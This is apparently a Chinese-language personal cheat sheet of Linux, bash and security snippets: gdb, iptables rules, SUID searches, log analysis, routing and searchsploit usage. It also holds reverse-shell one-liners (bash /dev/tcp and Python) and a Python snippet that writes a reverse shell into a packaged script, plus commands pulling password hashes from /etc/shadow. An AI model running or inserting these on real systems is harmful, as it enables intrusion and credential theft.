bash小代码

参考：
searchsploit
openkeerp-cli
youtube

gdb开启inter的flavor

$ echo "set disassembly-flavor intel" > ~/.gdbinit$ gdb ./x...(gdb) disas mainDump of assembler code for function main:   0x0000000000400637 <+0>: push   rbp   0x0000000000400638 <+1>: mov    rbp,rsp   0x000000000040063b <+4>: sub    rsp,0x30   0x000000000040063f <+8>: mov    DWORD PTR [rbp-0x24],edi   0x0000000000400642 <+11>:    mov    QWORD PTR [rbp-0x30],rsi   0x0000000000400646 <+15>:    mov    rax,QWORD PTR fs:0x28   0x000000000040064f <+24>:    mov    QWORD PTR [rbp-0x8],rax   0x0000000000400653 <+28>:    xor    eax,eax   0x0000000000400655 <+30>:    mov    rax,QWORD PTR [rbp-0x30]   0x0000000000400659 <+34>:    add    rax,0x8   0x000000000040065d <+38>:    mov    rdx,QWORD PTR [rax]   0x0000000000400660 <+41>:    lea    rax,[rbp-0x20]   0x0000000000400664 <+45>:    mov    rsi,rdx   0x0000000000400667 <+48>:    mov    rdi,rax   0x000000000040066a <+51>:    call   0x4004d0 <strcpy@plt>   0x000000000040066f <+56>:    lea    rax,[rbp-0x20]   0x0000000000400673 <+60>:    mov    rsi,rax   0x0000000000400676 <+63>:    mov    edi,0x40072c   0x000000000040067b <+68>:    mov    eax,0x0   0x0000000000400680 <+73>:    call   0x400500 <printf@plt>   0x0000000000400685 <+78>:    mov    eax,0x0   0x000000000040068a <+83>:    mov    rcx,QWORD PTR [rbp-0x8]   0x000000000040068e <+87>:    xor    rcx,QWORD PTR fs:0x28   0x0000000000400697 <+96>:    je     0x40069e <main+103>   0x0000000000400699 <+98>:    call   0x4004f0 <__stack_chk_fail@plt>   0x000000000040069e <+103>:   leave   0x000000000040069f <+104>:   retEnd of assembler dump.

Linux文件——保护禁止修改、删除、移动文件等

自动化恢复监控目录下创建的新文件和新目录
https://github.com/ssooking/CTFDefense/blob/02290457382a43d6d4daadd8e4e7e023d1d5d572/Monitor/SimpleMonitor.py
用法

pip install pynotifypython -m pynotify /tmp

Linux中查看指定进程socket连接数

ls /proc/<进程pid>/fd -l | grep socket: | wc -l

demo

cqq@kali:/tmp$ pidof sshd51070 51068 21038cqq@kali:/tmp$ sudo ls /proc/51068/fd -l | grep socket: | wc -l[sudo] password for cqq:3cqq@kali:/tmp$ sudo ls /proc/51068/fd -l | grep socket:lrwx------ 1 root root 64 Oct 10 17:45 3 -> socket:[109283]lrwx------ 1 root root 64 Oct 10 17:45 4 -> socket:[109319]lrwx------ 1 root root 64 Oct 10 17:45 6 -> socket:[109349]

禁止从客户机202.202.43.125访问202.202.43.55上的任何服务

iptables -t filter -A FORWARD -s 202.202.43.125 -d 202.202.43.55 -j DROP

丢弃陌生的TCP响应包,防止反弹式攻击

iptables -A INPUT -m state --state NEW -p tcp ! --syn -j DROPiptables -A FORWARD -m state --state NEW -p tcp --syn -j DROP

限制/允许某IP/网段SSH登录本机

iptable -t filter -A INPUT -s 202.202.43.125 -p tcp --dport 22 -j DROP 　　//禁止从202.202.43.125远程登陆到本机iptables -A INPUT -s 202.202.43.125/24 -p tcp --dport 22 -j ACCEPT　　//允许202.202.43.125网段远程登陆访问ssh

限制单个IP最大连接数

#限制单个IP的最大连接数为 30iptables -I INPUT -p tcp --dport 80 -m connlimit --connlimit-above 30 -j REJECT

封某个IP或IP段

iptables -I INPUT -s . -j DROPiptables -I INPUT -s ./ -j DROP

备份/还原MySQL数据库

## 备份mysql数据库mysqldump -u 用户名 -p 密码 数据库名 > back.sql　　　　mysqldump --all-databases > bak.sql　　　　　　## 还原mysql数据库mysql -u 用户名 -p 密码 数据库名 < bak.sql　　

找到正在系统上运行的所有SUID可执行文件

# 从/目录中查找具有SUID权限位且属主为root的文件并输出它们，然后将所有错误重定向到/dev/nullfind / -user root -perm -4000 -print 2>/dev/nullfind / -perm -u=s -type f 2>/dev/nullfind / -user root -perm -4000 -exec ls -ldb {} \;

demo

cqq@ubuntu:~$ find / -user root -perm -4000 -print 2>/dev/null/bin/umount/bin/ping/bin/su/bin/fusermount/bin/ntfs-3g/bin/ping6/bin/mount/usr/bin/vmware-user-suid-wrapper/usr/bin/passwd/usr/bin/gpasswd/usr/bin/chfn/usr/bin/sudo/usr/bin/newgrp/usr/bin/chsh/usr/lib/dbus-1.0/dbus-daemon-launch-helper/usr/lib/openssh/ssh-keysign/usr/lib/eject/dmcrypt-get-devicecqq@ubuntu:~$ find / -perm -u=s -type f 2>/dev/null/bin/umount/bin/ping/bin/su/bin/fusermount/bin/ntfs-3g/bin/ping6/bin/mount/usr/bin/vmware-user-suid-wrapper/usr/bin/passwd/usr/bin/gpasswd/usr/bin/chfn/usr/bin/sudo/usr/bin/newgrp/usr/bin/chsh/usr/lib/dbus-1.0/dbus-daemon-launch-helper/usr/lib/openssh/ssh-keysign/usr/lib/eject/dmcrypt-get-devicecqq@ubuntu:~$ find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null-rwsr-xr-x 1 root root 27608 Jun 14 14:51 /bin/umount-rwsr-xr-x 1 root root 44168 May  7  2014 /bin/ping-rwsr-xr-x 1 root root 40128 May 16 16:37 /bin/su-rwsr-xr-x 1 root root 30800 Jul 12  2016 /bin/fusermount-rwsr-xr-x 1 root root 142032 Jan 28  2017 /bin/ntfs-3g-rwsr-xr-x 1 root root 44680 May  7  2014 /bin/ping6-rwsr-xr-x 1 root root 40152 Jun 14 14:51 /bin/mount-rwsr-xr-x 1 root root 10624 Feb  9  2017 /usr/bin/vmware-user-suid-wrapper-rwsr-xr-x 1 root root 54256 May 16 16:37 /usr/bin/passwd-rwsr-xr-x 1 root root 75304 May 16 16:37 /usr/bin/gpasswd-rwsr-xr-x 1 root root 49584 May 16 16:37 /usr/bin/chfn-rwsr-xr-x 1 root root 136808 Jul  4 00:37 /usr/bin/sudo-rwsr-xr-x 1 root root 39904 May 16 16:37 /usr/bin/newgrp-rwsr-xr-x 1 root root 40432 May 16 16:37 /usr/bin/chsh-rwsr-xr-- 1 root messagebus 42992 Jan 12  2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper-rwsr-xr-x 1 root root 428240 Mar 16  2017 /usr/lib/openssh/ssh-keysign-rwsr-xr-x 1 root root 10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device

vim全局替换命令

 :%s/xxxx/yyyyy/g

花式反弹shell

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1######################################python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

使用SSH隧道

ssh -qTfnN -L port:host:hostport -l user remote_ip      #正向隧道，监听本地portssh -qTfnN -R port:host:hostport -l user remote_ip      #反向隧道，用于内网穿透防火墙限制之类ssh -qTfnN -D port remotehost                           #直接进行socks代理##         -q    安静模式#         -T    不占用shell#         -f    后台执行(推荐加-n参数)#         -N    不执行远程命令

递归改变某目录及其下面所有文件的属主和属组

# sudo chown -R cqq:cqq html

递归改变某目录的所有者为当前用户

# sudo chown -R $(whoami)  /usr/local/share

SSH端口转发

ssh -CfNg -L port1:127.0.0.1:port2 user@host 本地转发ssh -CfNg -R port2:127.0.0.1:port1 user@hsst 远程转发

Linux中以另一个用户身份运行命令

# Linux中以另一个用户身份运行命令$ sudo -u www-data touch /var/www/html/test_www-data# -u表示以某个user的身份，这里以www-data的身份创建了/var/www/html/test_www-data这个文件

从/etc/passwd中找出所有用户

$ cat /etc/passwd |cut -d ':' -f 1

从/etc/shadow中找出用户的密码hash

$ cat /etc/shadow |cut -d ':' -f 2 |egrep '^\$.\$'

wireshark过滤用不着的协议包

not arp and not ssdp and not icmp and not nbns and not dhcpfo and not llmnr and not mdns and not icmpv6 and not igmp and not dhcpv6

添加用户,并将其加入到sudo用户组

# 添加用户,并将其加入到sudo用户组$ useradd -m cqq -G sudo -s /bin/bash# 已有用户的情况下，将其加入sudo组$ usermod -a -G sudo cqq

在已有bash脚本中添加反弹shell的脚本

f = open('run.sh', 'w')f.write('#!/bin/bash\n')f.write('/bin/bash -i >& /dev/tcp/' + args.lhost + '/' + args.lport + ' 0>&1\n')f.close()# 最后添加执行权限os.chmod('run.sh', 0777)# 添加打包文件的功能import tarfile# 打开某gz文件，加入run.sh，然后关闭tar = tarfile.open("root.tar.gz", "w:gz")tar.add("run.sh")tar.close()# 读这个tar文件，并对读到的内容进行base64加密with open("root.tar.gz", "rb") as tarfile:tar64 = base64.b64encode(tarfile.read())

运维用的脚本

来自：https://xianzhi.aliyun.com/forum/read/2150.html

过滤Content-Length大于5M的日志

awk '{if($10>5000000){print $0}}' /var/log/httpd/access_log

重点关注POST请求

grep 'POST' /var/log/httpd/access_log | awk '{print $1}' | sort | uniq -c | sort -nr

查看ssh登录成功/失败的信息

grep 'Accepted' /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr

​或者last命令，它会读取位于/var/log/wtmp的文件，并把该文件记录的登录系统的用户名单，全部显示出来。

grep 'Failed' /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr

​或者lastb命令，会读取位于/var/log/btmp的文件，并把该文件记录的登入系统失败的用户名单，全部显示出来。

捕获终端信号

function control_c(){    service xxx stop    echo -en "xxx has been stopped!"    exit $?}# capture SIGINT(Ctrl + C) and exit the script cleantrap control_c SIGINT

判断当前用户是否是root

if [ "0" != "$UID" ] ; then    echo "需要 root 权限"    exit 1fi

判断是否存在某目录

if [ ! -d $CONFIG_PATH ] ; then    echo "首次使用，调用ok-config命令进行配置，若配置错误将无法登录"    ok-configfi

判断字符串的长度是否为0

为0，则为true

if [ -z $config_file ]; then    config_file="default"fi

不为0，则为true

if [ -n "$ppp_ip" ] ; then    echo "登录成功!"

判断字符串的后缀

if [ "cqupt" == "$(echo $OK_USER | awk -F '@' '{print $2}')" ] ; then

得到eth0网卡的默认网关

gateway_ip=`ip r | awk '/default via/&&/dev 'eth0'/{print $3}'`

输出ifconfig输出中的ip信息

root@snort-ids:/home/cqq/repos# ip a show dev eth0 | awk '/inet [12]/'    inet 172.18.124.136/22 brd 172.18.127.255 scope global eth0# 输出匹配行的第二列root@snort-ids:/home/cqq/repos# ip a show dev eth0 | awk '/inet [12]/{print $2}'172.18.124.136/22

删除默认路由

ip route del  172.0.0.0/8 > /dev/null 2>&1ip route del  202.202.0.0/16 > /dev/null 2>&1

添加内网路由

$OK_ETH = 'eth0'ip route add  172.16.0.0/12 dev $OK_ETH via $gateway_ip metric $OK_METRIC table $OK_RTTABLE> /dev/null 2>&1ip route add  172.32.0.0/16 dev $OK_ETH via $gateway_ip metric $OK_METRIC table $OK_RTTABLE> /dev/null 2>&1ip route add  172.33.0.0/16 dev $OK_ETH via $gateway_ip metric $OK_METRIC table $OK_RTTABLE> /dev/null 2>&1ip route add  172.34.0.0/16 dev $OK_ETH via $gateway_ip metric $OK_METRIC table $OK_RTTABLE> /dev/null 2>&1ip route add  202.202.32.0/20 dev $OK_ETH via $gateway_ip metric $OK_METRIC table $OK_RTTABLE> /dev/null 2>&1ip route add  202.202.43.0/24 dev $OK_ETH via $gateway_ip metric $OK_METRIC table $OK_RTTABLE> /dev/null 2>&1ip route add  202.202.45.0/24 dev $OK_ETH via $gateway_ip metric $OK_METRIC table $OK_RTTABLE> /dev/null 2>&1ip route add  222.177.140.0/24 dev $OK_ETH via $gateway_ip metric $OK_METRIC table $OK_RTTABLE> /dev/null 2>&1

progname="$( basename "$0" )"...## Usage infofunction usage(){  echo "  Usage: ${progname} [options] term1 [term2] ... [termN]"  echo  echo "=========="  echo " Examples "  echo "=========="  echo "  ${progname} afd windows local"  echo "  ${progname} -t oracle windows"  echo "  ${progname} -p 39446"  echo  echo "  For more examples, see the manual: https://www.exploit-db.com/searchsploit/"  echo  echo "========="  echo " Options "  echo "========="  echo "   -c, --case     [Term]      Perform a case-sensitive search (Default is inSEnsITiVe)."  echo "   -e, --exact    [Term]      Perform an EXACT match on exploit title (Default is AND) [Implies \"-t\"]."  echo "   -h, --help                 Show this help screen."  echo "   -j, --json     [Term]      Show result in JSON format."  echo "   -m, --mirror   [EDB-ID]    Mirror (aka copies) an exploit to the current working directory."  echo "   -o, --overflow [Term]      Exploit titles are allowed to overflow their columns."  echo "   -p, --path     [EDB-ID]    Show the full path to an exploit (and also copies the path to the clipboard if possible)."  echo "   -t, --title    [Term]      Search JUST the exploit title (Default is title AND the file's path)."  echo "   -u, --update               Check for and install any exploitdb package updates (deb or git)."  echo "   -w, --www      [Term]      Show URLs to Exploit-DB.com rather than the local path."  echo "   -x, --examine  [EDB-ID]    Examine (aka opens) the exploit using \$PAGER."  echo "       --colour               Disable colour highlighting in search results."  echo "       --id                   Display the EDB-ID value rather than local path."  echo "       --nmap     [file.xml]  Checks all results in Nmap's XML output with service version (e.g.: nmap -sV -oX file.xml)."  echo "                              Use \"-v\" (verbose) to try even more combinations"  echo "======="  echo " Notes "  echo "======="  echo " * You can use any number of search terms."  echo " * Search terms are not case-sensitive (by default), and ordering is irrelevant."  echo "   * Use '-c' if you wish to reduce results by case-sensitive searching."  echo "   * And/Or '-e' if you wish to filter results by using an exact match."  echo " * Use '-t' to exclude the file's path to filter the search results."  echo "   * Remove false positives (especially when searching using numbers - i.e. versions)."  echo " * When updating from git or displaying help, search terms will be ignored."  echo ""  exit 2}